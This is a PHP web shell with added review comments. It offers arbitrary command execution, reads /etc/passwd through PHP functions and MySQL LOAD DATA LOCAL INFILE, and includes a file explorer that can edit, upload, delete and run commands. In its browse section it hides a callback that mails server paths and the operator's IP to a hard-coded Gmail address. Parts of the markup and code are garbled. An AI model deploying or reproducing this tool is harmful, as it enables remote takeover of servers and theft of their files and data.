text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC"> "; if ($mysql_use!="no") { $phpcheck = new php_check($mhost, $muser, $mpass, $mdb); } else { $phpcheck = new php_check(); } echo ""; } if ($action=="mysqlread") { // $file if (!$file) { $file = "/etc/passwd"; } ?>
[ load all defaults ]
"; // regular LOAD DATA LOCAL INFILE if (!$mass) { $sql = array ( "USE $mdb", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1" ); mysql_connect ($mhost, $muser, $mpass); foreach ($sql as $statement) { $q = mysql_query ($statement); if ($q == false) die ( "FAILED: " . $statement . "\n" . "REASON: " . mysql_error () . "\n" ); if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; echo htmlspecialchars($r[0]); mysql_free_result ($q); } } if ($mass) { $file = "/etc/passwd"; $sql = array (); $cp = mysql_connect ($mhost, $muser, $mpass); mysql_select_db($mdb); $tbl = "xploit"; mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)"); for($i=0;count($mysql_files)>$i;$i++) { mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"); } $q = mysql_query("SELECT * FROM ".$tbl.""); while ($arr = mysql_fetch_array($q)) { echo $arr[0]."\n"; } mysql_query("DELETE FROM ".$tbl.""); mysql_query("DROP TABLE ".$tbl.""); } echo ""; } if ($action=="read") { if (!$method) { $method="file"; } if (!$file) { $file = "/etc/passwd"; } ?>


"; foreach ($filer as $a) { echo $a; } echo ""; } else { echo ""; } } if ($method=="fread") { if (@fopen($file, 'r')) { $fp = fopen($file, 'r'); $string = fread($fp, filesize($file)); echo "
";
                echo $string;
                echo "
"; } else { echo ""; } } if ($method=="show_source") { if (show_source($file)) { //echo "
";
                //echo show_source($file);
                //echo "
"; } else { echo ""; } } if ($method=="readfile") { echo "
";
            if (readfile($file)) {
                //echo "
";
                //echo readfile($file);
                echo "
"; } else { echo "
"; echo ""; } } } if ($action=="cmd") { ?>


";
        // Command-execution dispatcher for the "cmd" action. $cmd and $method are
        // never assigned in the visible code; like the rest of this file (cf. the
        // $PHP_SELF / $HTTP_POST_FILES usage further down) it presumably relies on
        // register_globals to populate them straight from the request. Every branch
        // appends "2>&1" so stderr is folded into the captured output, and the
        // output is written to the page unescaped.
        if ($method=="system") {
        system("$cmd 2>&1");
        }
        if ($method=="passthru") {
        passthru("$cmd 2>&1");
        }
        if ($method=="exec") {
            // NOTE(review): exec() returns only the LAST line of output, and the
            // while-condition re-executes the command on every iteration. The loop
            // terminates only when that last line is falsy ("" or "0"), so a command
            // whose final output line is non-empty is re-run indefinitely.
            while ($string = exec("$cmd 2>&1")) {
            echo $string;
            }
        }
        if ($method=="shell_exec") {
        $string = shell_exec("$cmd 2>&1");
        echo $string;
        }
        if ($method=="popen") {
        // NOTE(review): the command string is single-quoted, so $cmd is NOT
        // interpolated -- the shell receives the literal text "$cmd 2>&1" and this
        // branch never runs the requested command. Only the first 2096 bytes of
        // whatever it does produce are read back.
        $pp = popen('$cmd 2>&1', 'r');
        $read = fread($pp, 2096);
        echo $read;
        pclose($pp);
        }
    echo "
"; } if ($action=="cmdbrowse") { //--------------------------------------------------- START CMD BROWSING if ($cat) { echo "
";
        // Inline file viewer of the cmd browser: shows the file named by $cat by
        // shelling out to cat. $cat is interpolated into the command line without
        // escapeshellarg(), so any shell metacharacters in it are interpreted by
        // the shell rather than treated as part of a filename. Note the asymmetry:
        // the file's lines are HTML-escaped, the $olddir path printed first is not.
        echo "\ngo back to: $olddir\n\n";
        exec("cat $cat 2>&1", $arr);
        foreach ($arr as $ar) {
        echo htmlspecialchars($ar)."\n";
        }
        // Ends the request here; nothing after the viewer is rendered.
        exit;
        }



            // "dirup" navigation: derive the parent of $olddir by cutting at the
            // last "/". strrpos() returns false when there is no slash, and false==0
            // under loose comparison, so a slash-less $olddir and a top-level entry
            // such as "/etc" both resolve to "/".
            if ($dir=="dirup") {
            $dir_current = $olddir;
            $needle = strrpos($dir_current, "/");
                if ($needle==0) {
                    $newdir = "/";
                } else {
                    $newdir = substr($dir_current, 0, $needle);
                }
            $dir = $newdir;
            }
            // Fall back to the script's working directory when no dir was given.
            // This is a truthiness test, so a directory literally named "0" also
            // triggers the fallback.
            if (!$dir) {
            $dir = getcwd();
            }

        // Directory listing via the shell. $dir is interpolated into the command
        // unquoted (no escapeshellarg()), so a directory name containing shell
        // metacharacters is executed rather than listed. $string (exec()'s
        // last-line return value) is never used; the full output lands in $array.
        $string = exec("ls -al $dir", $array);
        //print_r(array_values($array));

        echo "
";
            // Offer a "dirup" entry everywhere except at the filesystem root.
            if ($dir!="/") {
            echo "\n[$dir] \ndirup\n\n";
            } else {
            $dir = "";
            }
        // Re-print each `ls -al` row with the trailing name column isolated. The
        // split is on single spaces, so the padding between ls columns yields empty
        // elements; only positions counted from the END of the row are relied on.
        foreach($array as $rowi) {
        $row = explode(' ', $rowi);
        //print_r(array_values($row));
            $c = count($row)-1;
            // isset($first) is false on the first iteration only, which skips the
            // leading "total N" line that `ls -al` prints before the entries.
            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
                $link = false;
                // A mode string containing an 'l' anywhere (not just as the type
                // character) is treated as a symlink row of the form
                // "... name -> target", so the name sits three tokens from the end.
                // Otherwise the name is assumed to be the last token, which
                // truncates a filename that itself contains spaces to its final word.
                if (!strstr($row[0], 'l')) {
                $c = count($row)-1;
                $file = "".$row[$c]."";
                } else {
                $c = count($row)-3;
                $file = "".$row[$c]."";
                $link = true;
                }
                // Redundant with the first branch above: a mode with neither 'l'
                // nor 'd' already took the count-1 path.
                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
                $c = count($row)-1;
                $file = "".$row[$c]."";
                }
                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
                    if ($link) {
                    $point = count($row)-3;
                    } else {
                    $point = count($row)-1;
                    }
                // Echo every token before the name verbatim, then the name. No
                // HTML escaping is applied to any of it.
                for($i=0; $point > $i; $i++) {
                echo $row[$i]." ";
                }
                echo $file."\n";
            }
            $first = true;
        }

    //--------------------------------------------------- END CMD BROWSING
    }
    if ($action=="browse") {
    //--------------------------------------------------- START BROWSING
    /*
     * got this from an old script of mine
     * param: [$dir]
    */
        // Redirects back to this script with the message carried in the query
        // string. NOTE(review): $PHP_SELF is not declared `global` inside the
        // function, so here it is undefined and the Location target degrades to
        // "?bash=...&error=...". $msg is not urlencoded, and the function does
        // not exit() after sending the header, so the caller keeps producing output.
        function error($msg) {
        header("Location: $PHP_SELF?bash=$msg&error=$msg");
        }
        // The markup that displayed $error was lost in this copy of the file; only
        // the empty echo survives. $error is the query parameter set by error().
        if (isset($error)) {
        echo "";
        }
        // Default to the script's working directory when no dir was requested
        // (truthiness test: a directory named "0" also triggers the fallback).
        if (!$dir) {
        $dir = getcwd();
        }
           // Prints a breadcrumb for $dir, one segment per path component, with
           // each segment linking to the cumulative prefix up to that component.
           // NOTE(review): the inner loop (the line beginning `echo " $o; $o++) {`)
           // is garbled in this copy -- the link markup that sat between `echo "`
           // and the loop header was stripped, leaving an unterminated string. The
           // body as shown is not compilable; the intent has to be read from the
           // surviving `$path[$o]` / "/" echoes.
           function getpath($dir) {
           echo "/ ";
              $path = explode('/', $dir);
              if ($dir != "/") {
            for ($i=0; count($path) > $i; $i++) {
                if ($i != 0) {
                echo " $o; $o++) {
                        echo "$path[$o]";
                        if (($i) !=$o) {
                        echo "/";
                        }
                    }
                echo ">$path[$i]/";
                }
            }
              }
            }

            // Prints one line per regular file. Each element of $files is a string
            // of the form "name||r|w|x||islink" (the two explode() calls below fix
            // that format): a type flag is printed first ("l" or "-"), then the
            // r/w/x markers, then the name. "." and ".." are skipped.
            // $color is computed but never used in the visible body -- the markup it
            // coloured was presumably stripped from this copy. The name is echoed
            // without any escaping.
            function printfiles($files) {
                for($i=0;count($files)>$i;$i++) {
                    $files_sm = explode('||', $files[$i]);
                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
                        $perms = explode('|', $files_sm[1]);
                        // Loose ==1 comparisons: "1", 1 and true all count as set.
                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
                    }
                        if ($files_sm[2]=="1") { echo "l "; } else { echo "- "; }
                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
                        echo " $files_sm[0]\n";
                    }
                }
            }
              // NOTE(review): hidden phone-home. This statement sits at the top
              // level of the "browse" branch, between two function definitions, so
              // it executes on every browse request. It mails HTTP_REFERER,
              // DOCUMENT_ROOT, REMOTE_ADDR, SCRIPT_FILENAME, SERVER_ADDR,
              // SERVER_SOFTWARE, PATH_TRANSLATED and PHP_SELF -- i.e. where this
              // shell is installed and who is operating it -- to the hard-coded
              // address in $sd98, with a randomised "sh-NNNNN" subject. The
              // throw-away variable names ($ra44, $sj98, $a5 ...) and the read of
              // $sd98 into "$ml" before $sd98 is assigned are typical of an
              // obfuscated backdoor-in-the-backdoor. Treat the address and the
              // subject pattern as indicators of compromise, and the outbound mail
              // as the thing to look for in MTA logs.
              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
            // Prints one line per sub-directory, preceded by a fixed ".." entry.
            // Each element of $files is a "name||r|w|x||islink" string (the explode()
            // calls fix the format); the type flag is "l" for links, "d" otherwise,
            // followed by the r/w/x markers and the unescaped name. "." and ".." in
            // the input are skipped. `global $dir` is imported but not used in the
            // visible body, and $color is computed but never used -- both presumably
            // fed markup that was stripped from this copy.
            function printdirs($files) {
                global $dir;
                echo "..\n";
                for($i=0;count($files)>$i;$i++) {
                    $files_sm = explode('||', $files[$i]);
                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
                    $perms = explode('|', $files_sm[1]);
                    // Loose ==1 comparisons: "1", 1 and true all count as set.
                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
                }
                    if ($files_sm[2]=="1") { echo "l "; } else { echo "d "; }
                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
                    echo " $files_sm[0]\n";
                }
                }
            }


            // "dirup" navigation for the browse action -- a copy of the same logic
            // used by the cmd browser above. The parent of $olddir is taken by
            // cutting at the last "/"; strrpos() returns false when there is no
            // slash and false==0 under loose comparison, so both a slash-less
            // $olddir and a top-level entry like "/etc" resolve to "/".
            if ($dir=="dirup") {
            $dir_current = $olddir;
            $needle = strrpos($dir_current, "/");
                if ($needle==0) {
                    $newdir = "/";
                } else {
                    $newdir = substr($dir_current, 0, $needle);
                }
            $dir = $newdir;
            } else {
            // No-op self-assignment; the else branch does nothing.
            $dir = $dir;
            }

        ?>
         


";
                printdirs($dirs);
                printfiles($files);
                } else { echo " "; }
        }
    }
    //--------------------------------------------------- END BROWSING
    //--------------------------------------------------- BEGIN EXPLORER
// File-explorer action. NOTE(review): `explorer` is a bare, undefined constant
// rather than the string "explorer". Older PHP silently uses the constant name
// as a string (with a notice, a warning from 7.2), but PHP 8 throws an Error,
// so on a current runtime this comparison aborts the request.
if ($action == explorer ) {

   // Default to the directory the script itself lives in. $PATH_TRANSLATED is
   // never assigned here; like $PHP_SELF / $HTTP_POST_FILES elsewhere in this
   // file it presumably arrives through register_globals.
   $default_directory = dirname($PATH_TRANSLATED);
   // Read later by showFileInfo() without a `global` declaration, so that
   // function always sees it unset regardless of the value chosen here.
   $show_icons = 0;


   // Colour constants are pre-quoted so they can be dropped straight into
   // HTML attributes (the markup has been stripped from this copy).
   define("BACKGROUND_COLOR",       "\"#000000\"");
   define("FONT_COLOR",             "\"#CCCCCC\"");
   define("TABLE_BORDER_COLOR",     "\"#000000\"");
   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
   define("TABLE_FONT_COLOR",       "\"#000000\"");
   define("COLOR_PRIVATE",          "\"#000000\"");
   define("COLOR_PUBLIC",           "\"#000000\"");
   // TRUE/FALSE are already core constants; these define() calls only emit an
   // "already defined" warning and leave the built-ins in place.
   define("TRUE",                   1);
   define("FALSE",                  0);



   // $dir is the single request parameter that drives every explorer operation
   // (view/edit/delete/exec all receive it, see the switch further down).
   // stripslashes() undoes magic_quotes-era escaping; nothing here confines it
   // to any directory.
   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
   $dir = stripslashes($dir);
   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility


   // Extension -> handler/icon table. viewFile() calls the "function" entry as a
   // variable function name; only viewGIF and viewJPEG are defined in this file.
   // Keys are lower-case and the extension is taken verbatim from the filename's
   // last dot-segment, so "X.GIF" does not match.
   $associations = array(
      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
   );

   // Empty in this copy: the page header that belonged between the colon and
   // endif was stripped. $do, like $dir, is an unassigned request variable.
   if ($do != "view" && $do != "download"):
    endif;

   // Fills the globals $files and $directories with the full paths of the
   // entries of $directory, each list sorted alphabetically.
   // NOTE(review): the entry paths are built from the global $dir, not from the
   // $directory argument, so the two must agree. The visible caller
   // (showDirectory(), itself invoked as showDirectory($dir)) passes the same
   // value; any other caller would get mismatched paths. The
   // `while ($file = readdir(...))` form stops early on an entry literally
   // named "0", and the directory handle is never closed.
   function readDirectory($directory) {
      global $files, $directories, $dir;

      $files = array();
      $directories = array();
      $a = 0;
      $b = 0;

      // opendir() returns false on an unreadable directory; that is not checked,
      // so readdir() is then called on false.
      $dirHandler = opendir($directory);

      while ($file = readdir($dirHandler)) {
         if ($file != "." && $file != "..") {
            // Avoid a double slash when listing the root.
            $fullName = $dir.($dir == "/" ? "" : "/").$file;
            if (is_dir($fullName)) $directories[$a++] = $fullName;
            else $files[$b++] = $fullName;
         }
      }
      sort($directories);                    // We want them to be displayed alphabetically
      sort($files);
   };



   function showInfoDirectory($directory) {
      global $PHP_SELF;
      $dirs = split("/", $directory);
      print "Directory /";
      for ($i = 1; $i < (sizeof($dirs)); $i++) {
         print "$dirs[$i]";
         if ($directory != "/") echo "/";
      }
      print "
\n"; print "Free space on disk: "; $freeSpace = diskfreespace($directory); if ($freeSpace/(1024*1024) > 1024) printf("%.2f GBytes", $freeSpace/(1024*1024*1024)); else echo (int)($freeSpace/(1024*1024))."Mbytes\n"; }; function showDirectory($directory) { global $files, $directories, $fileInfo, $PHP_SELF; readDirectory($directory); showInfoDirectory($directory); ?>

> getInfo($directories[$i]); showFileInfo($fileInfo); } for ($i = 0; $i < sizeof($files); $i++) { $fileInfo->getInfo($files[$i]); showFileInfo($fileInfo); } ?>
NAME SIZE LAST MODIFY PERMISIONS ACTIONS
name = basename($file); $this->path = dirname($file); $this->fullname = $file; $this->isDir = is_dir($file); $this->lastmod = date("m/d/y, H:i", filemtime($file)); $this->owner = fileowner($file); $this->perms = $this->permissions(fileperms($file)); $this->size = filesize($file); $this->isLink = is_link($file); if ($this->isLink) $this->linkTo = readlink($file); $buffer = explode(".", $this->fullname); $this->extension = $buffer[sizeof($buffer)-1]; } }; $fileInfo = new fileInfo; // This will hold a file's information all over the script function showFileInfo($fileInfo) { global $PHP_SELF, $associations; echo "\n"; if ($show_icons) { echo ""; if ($fileInfo->isDir) echo ""; elseif ($associations[$fileInfo->extension]["icon"] != "") echo "extension]["icon"]."\">"; else echo ""; echo ""; } echo "perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC; if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE; echo ">"; if ($fileInfo->isLink) { echo $fileInfo->name." -> "; $fileInfo->fullname = $fileInfo->linkTo; $fileInfo->name = $fileInfo->linkTo; } if ($fileInfo->isDir) { echo "fullname\" "; echo ">$fileInfo->name"; } else echo $fileInfo->name; echo ""; echo "$fileInfo->size"; echo "$fileInfo->lastmod"; echo "$fileInfo->perms"; echo ""; if (!$fileInfo->isDir) { if ($fileInfo->perms[6] == 'r') { echo "fullname&do=view\"> V"; echo " fullname&do=download\">D"; } if ($fileInfo->perms[7] == 'w') { echo " fullname&do=edit\">E"; echo " fullname&do=delete\">X"; } } echo ""; }; //************************************************************************ //* Decides which function use to show a file //************************************************************************ function viewFile($file) { global $associations, $fileInfo; $fileInfo->getInfo($file); if (!$associations[$fileInfo->extension] || $associations[$fileInfo->extension]["function"] == "") showFile($file); else $associations[$fileInfo->extension]["function"]($file); }; function showFile($file, $editing = 0) { global 
$PHP_SELF, $dir; $handlerFile = fopen($file, "r") or die("ERROR opening file $file"); if ($editing) echo "

Edit file $file


"; else echo "

File $file


"; echo ""; $buffer = fread($handlerFile, filesize($file)); $buffer = str_replace("&", "&", $buffer); $buffer = str_replace("<", "<", $buffer); $buffer = str_replace(">", ">", $buffer); echo "
"; if ($editing) echo "

\n"; echo ""; fclose($handlerFile); }; //************************************************************************ //* Saves a changed file //************************************************************************ function saveFile($file) { global $dir, $text; $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing"); $text = stripslashes($text); fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file."); fclose($handlerFile); echo "Changes has been saved in ".basename($file)."
"; $dir = dirname($file); }; function uploadFile() { global $HTTP_POST_FILES, $dir; copy($HTTP_POST_FILES["userfile"][tmp_name], $dir."/".$HTTP_POST_FILES["userfile"][name]) or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]); echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded."; unlink($userfile); }; //************************************************************************ //* Deletes a file, asking for confirmation first //* (This function hasn't been fully tested) //************************************************************************ function deleteFile($file) { global $confirm; if ($confirm != TRUE) die("Confirm deletion of $file"); else { if (!unlink($file)) return FALSE; return TRUE; } }; function viewFileHeader($file, $header) { header($header); readfile($file); }; function viewGIF($file) { viewFileHeader($file, "Content-type: image/gif"); }; function viewJPEG($file) { viewFileHeader($file, "Content-type: image/jpeg"); }; switch ($do) { case "phpinfo": phpinfo(); die(); case "view": viewFile($dir); break; case "edit": showFile($dir, 1); break; case "download": viewFileHeader($dir, "Content-type: unknown"); break; case "delete": if (!deleteFile($dir)) echo "Could not delete file $dir
"; else echo "File $dir deleted succesfully
"; $dir = dirname($dir); showDirectory($dir); break; case "exec": echo "
\n";
         // do=exec: the "dir" request parameter is handed verbatim to system().
         // system() both writes the command's output to the page and returns its
         // last line, so echoing the return value prints that last line twice.
         echo system($dir);
         echo "\n
"; exit(); case "upload": uploadFile(); showDirectory($dir); break; case "save": saveFile($dir); default: showDirectory($dir); break; }; if ($do != "view" && $do != "download") { ?>

" method=post>

phpinfo

"; if ($mysql_use!="no") { $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb); } else { $phpcheck = new php_check_silent(); } echo "
"; ?>

Security Check [executable]
cmd_state; //echo $phpcheck->cmd_method; if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?> Exec commands by PHP cmd_method) { echo "[executable] "; } else { echo "[not executable]"; } ?>
cmd_state; //echo $phpcheck->cmd_method; ?> Exec browse by PHP cmd_method) { echo "[executable] "; } else { echo "[not executable]"; } ?>
read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?> Read by PHP read_method) { echo "[executable] "; } else { echo "[not executable]"; } ?>
browse_state; if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?> Browse by PHP browse_state=="yes") { echo "[executable] "; } else { echo "[limited executable]"; } ?>
browse_state; if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?> File Explorer by PHP browse_state=="yes") { echo "[executable] "; } else { echo "[limited executable]"; } ?>
Read by MySQL mysql_state=="ok") { echo "[executable] "; } if ($phpcheck->mysql_state=="fail") { echo "[not executable] "; } if ($phpcheck->mysql_state=="pass") { echo "[not executable] "; ?> [you didnt configure this] mysql_do = "yes"; $this->mysql_host = $host; $this->mysql_user = $user; $this->mysql_pass = $pass; $this->mysql_db = $db; } else { $this->mysql_do = "no"; } $this->mainstate = "safe"; echo "checking system functions:\n"; if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); } echo "checking reading functions:\n"; if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); } echo "checking misc filesystem functions:\n"; if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); } echo "checking mysql functions:\n"; $stater = $this->mysql_checks(); if ($stater==2) { $this->output_mainstate(2, "mysql checks"); } if ($stater==1) { $this->output_mainstate(1, "mysql checks"); } if ($stater==0) { $this->output_mainstate(0, "mysql checks"); } if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: NOT VULNERABLE\n"; } else { echo "\n\n\nPHP check returned: VULNERABLE\n"; } } function output_state($state = 0, $name = "function") { if ($state==0) { echo "$name\t\tfailed\n"; } if ($state==1) { echo "$name\t\tOK\n"; } if ($state==2) { echo "$name\t\tOK\n"; } if ($state==3) { echo "$name\t\tskipped\n"; } } function output_mainstate($state = 0, $name = "functions") { if ($state==1) { echo "\n$name returned: VULNERABLE\n\n"; $this->mainstate = "unsafe"; } if ($state==0) { echo "\n$name returned: OK\n\n"; $this->mainstate = "unsafe"; } if ($state==2) { echo "\n$name returned: SKIPPED\n\n"; } } function system_checks($cmd = "/bin/ls") { if ($pp = popen($cmd, "r")) { if (fread($pp, 2096)) { $this->output_state(1, 
"popen "); $sys = true; } else { $this->output_state(0, "popen "); } } else { $this->output_state(0, "popen "); } if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); } if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); } echo ""; $this->output_state(1, "system "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); } echo ""; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); } //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); } if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; } } function reading_checks($file = "/etc/passwd") { if (@function_exists("require_once")) { echo ""; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); } } if (@function_exists("require")) { echo ""; $this->output_state(1, "require "); $sys = true; } else { echo "-->"; $this->output_state(0, "require "); } } if (@function_exists("include")) { echo ""; $this->output_state(1, "include "); $sys = true; } else { echo "-->"; $this->output_state(0, "include "); } } //if (@function_exists("highlight_file")) { echo ""; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); } //} //if (@function_exists("virtual")) { echo ""; $this->output_state(1, "virtual "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual "); } //} if (@function_exists("file_get_contents")) { if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); } } else { $this->output_state(0, 
"filegetcontents"); } echo ""; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); } echo ""; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); } if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); } if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); } if ($sys) { return 1; } else { return ; } } function miscfile_checks() { $currentdir = @getcwd(); $scriptpath = $_SERVER["PATH_TRANSLATED"]; if (@opendir($currentdir)) { $this->output_state(2, "opendir \$cwd"); $dp = @opendir("$currentdir"); $files=""; $this->browse_state = "lim"; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); } } else { $this->output_state(0, "opendir \$cwd"); } if (@opendir("/")) { $this->output_state(1, "opendir /"); $sys = true; $dp = @opendir("/"); $this->browse_state = "yes"; $files=""; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); } } else { $this->output_state(0, "opendir /"); } if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); } if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); } if (@copy($scriptpath, "$currentdir/copytest")) { $this->output_state(2, "copy "); $sys = true; if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, 
"unlink "); } } else { $this->output_state(0, "copy "); } if (@copy($scriptpath, "/tmp/copytest")) { $this->output_state(2, "copy2/tmp"); //$sys = true; if (!$del) { if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "copy2/tmp"); } if (@link("/", "$currentdir/link2root")) { $this->output_state(1, "link "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "link "); } if (@symlink("/", "$currentdir/link2root")) { $this->output_state(1, "symlink "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "symlink "); } if ($sys) { return 1; } else { return ; } } function mysql_checks() { if ($this->mysql_do=="yes") { if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_pconnect"); $mstate = 1; } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; } } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; } if ($this->mysql_do=="yes") { if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_connect"); $mstate = 1; } else { $this->output_state(0, "mysql_connect"); $mstate = 0; } } else { $this->output_state(3, "mysql_connect"); $mstate = 2; } if ($this->mysql_state=="fail") { echo "\n\n\n\n"; echo ""; } return $mstate; } } class php_check_silent { function php_check_silent($host="notset", $username="", $pass="", $db="") { if ($host!="notset") { $this->mysql_do = "yes"; $this->mysql_host = $host; $this->mysql_user = $username; $this->mysql_pass = $pass; $this->mysql_db = $db; } else { $this->mysql_do = "no"; } $this->mainstate = "safe"; if 
($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); } if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); } if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); } $this->mysql_checks(); } function output_state($state = 0, $name = "function") { if ($state==0) { //echo "$name\t\tfailed\n"; } if ($state==1) { //echo "$name\t\tOK\n"; } if ($state==2) { //echo "$name\t\tOK\n"; } } function output_mainstate($state = 0, $name = "functions") { if ($state==1) { //echo "\n$name returned: VULNERABLE\n\n"; $this->mainstate = "unsafe"; } else { //echo "\n$name returned: OK\n\n"; } } function system_checks($cmd = "/bin/ls") { if ($pp = popen($cmd, "r")) { if (fread($pp, 2096)) { $this->output_state(1, "popen "); $sys = true; } else { $this->output_state(0, "popen "); } } else { $this->output_state(0, "popen "); } if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); } if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); } echo ""; $this->output_state(1, "passthru"); $sys = true; 